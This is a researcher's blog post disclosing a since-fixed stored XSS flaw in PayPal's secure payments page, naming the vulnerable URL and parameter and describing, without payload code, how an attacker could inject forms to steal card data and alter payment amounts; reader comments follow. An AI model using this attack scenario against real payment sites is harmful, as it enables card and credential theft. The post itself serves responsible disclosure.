Paypal critical vulnerability to steal all your Paypal funds!

facebooktwittergoogle_plusredditpinterestlinkedinmail

 

url

Hello Readers :)

This is Zigoo0 again, and today i will talk about a Stored XSS Vulnerability in “https://Securepayments.Paypal.com” that could be used by attackers to steal Paypal users credit card and login credentials and more!

Vulnerability Title: Paypal Critical Vulnerability to steal Users Credit Cards in ClearText format

Vulnerable Page: https://securepayments.paypal.com/cgi-bin/acquiringweb

Vulnerable Parameter: template

Vulnerability Details:

Paypal SecurePayments domain is used by paypal users to do secure payments when purchasing from any shopping site,

This secure payments page require Paypal users to fill some forms that include their Credit Card number, CVV2, Expiry date and more to finalize the payment and purchase the products via their Paypal account,

The submitted data is processed through encrypted channel(HTTPS) so attackers wont be able to sniff/steal such data.

I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content, An attacker can provide his own HTML forms to the user to fullfill and send the users data back to attacker’s server in clear text format, and then use this information to purchase anything in behave of users or even transfere the users fund to his own account!

Screenshot from 2015-08-26 20:07:14

Vulnerability Consequences:

The worst attacking scenario that could be conducted using this vulnerability is:

1- Attacker setup shopping site or Hack into any shopping site, alter the “CheckOut” button with the Paypal Vulnerability,

2- Paypal user browse the malformed shopping site, choose some products, click on “CheckOut” button to Pay with his Paypal account,

3- User get’s redirected to https://Securepayments.Paypal.com/ to fill the required Credit Card information to complete the purchasing order, In the same page, the products price that will be paid is included inside the same page, and as we know the attacker now control this page!

4- Now when you (Paypal user) click on Submit Payment button, instead of paying let’s say “100$” YOU WILL PAY TO THE ATTACKER WHATEVER AMOUNT THE ATTACKER’S DECIDE!!

Screenshot from 2015-08-26 20:50:32

Demo: Now that you’ve reviewed the vulnerability details, it’s the Demo time :D

In below demo video i’ve showed how an attacker with this vulnerability could steal your Credit Card and login Credentials information!

 

As an Ethical Hacker, this vulnerability was reported to Paypal and is now FIXED, Welcome back SECURED SecurePayments :)

Below is a TimeLine of the vulnerability:

Time Line:

Vulnerability Discovery: 19/Jun/15 2:27 AM

Vulnerability Reported: 19/Jun/15 7:10 AM

Remediation Notification: Aug 24, 2015 at 7:04 PM

msg

Thanks Paypal Security team for the good coordination the fast responses for Emails.

You can follow me on Twitter for the latest vulnerabilities/news/updates -> @Zigoo0 :)

This Post was Viewed (18436) times.

13 Comments

  1. Eslam Medhat - August 26, 2015

    This is so awesome :) . Nice catch!!

  2. Anonyme - August 26, 2015

    It’s really a Great find dear Zigoo0 Keep on (y) , But we need the detail poc of the XSS (Where the was XSS exist ) if you could share it since it’s FIXED ,

    Thanks

  3. Paypal critical Flaw allows to steal all your fundsSecurity Affairs - August 26, 2015

    […] “I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content, An attacker can provide his own HTML forms to the user to fulfill and send the users data back to attacker’s server in clear text format, and then use this information to purchase anything in behave of users or even transfer the users fund to his own account!” wrote the expert in a blog post. […]

  4. PayPal critical Flaw allows to steal all your funds - Systerity - August 26, 2015

    […] “I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content, An attacker can provide his own HTML forms to the user to fulfill and send the users data back to attacker’s server in clear text format, and then use this information to purchase anything in behave of users or even transfer the users fund to his own account!” wrote the expert in a blog post. […]

  5. Dr.FarFar - August 26, 2015

    ما شاء الله
    في إبداع دائم يابشمهندس

  6. Rdx - August 27, 2015

    The great zig0
    Keep pewing every one xDDD

  7. PayPal Vulnerability Allows Hackers to Steal All Your Money - Middle East Post | Middle East Post - August 27, 2015

    […] explains a step by step process in his blog post, which gives a detailed explanation of the attack. Here’s what the researcher calls the worst […]

  8. PayPal Vulnerability Allows Hackers to Steal All Your Money | Geek The Net - August 27, 2015

    […] explains a step by step process in his blog post, which gives a detailed explanation of the attack. Here’s what the researcher calls the worst […]

  9. Mohammed Gad - August 27, 2015

    Awesome one!
    Keep it up Zigo0 :D

  10. Ravisankar - September 1, 2015

    Hello Ebrahim
    Good work on finding such a vulnerability and a good video of POC you have provided.
    Best Wishes for the future

    Ravisankar
    Security Researcher & Blogger

  11. Paypal.me : une nouvelle extension du service de paiement Paypal pour le transfert d’argent (Gim.me gim.me) ! | SOSordi.net - September 1, 2015

    […] de débiter selon le montant désiré ou encore récupérer les informations bancaires. Découverte par un certain Zigoo0 (Ebrahim Hegazy), elle aurait été connu par Paypal depuis le 19 Juin dernier… A suivre […]

  12. Adam Davies - February 25, 2016

    Great find and nice to see Paypal following the bug bounty properly. I’ve seen several complaints about them patching bugs then pretending they weren’t issues in the past, so this is good to see!

  13. 利用Paypal漏洞 黑客盗取你的全部财产于无形 - G-Crew - September 15, 2016

    […] 但是,安全研究员Ebrahim Hegazy表示:攻击者可通过建立一个恶意在线商店或者是对合法购物网站进行劫持,然后再利用该漏洞窃取用户的登录凭证和信用卡信息。 […]

Leave a reply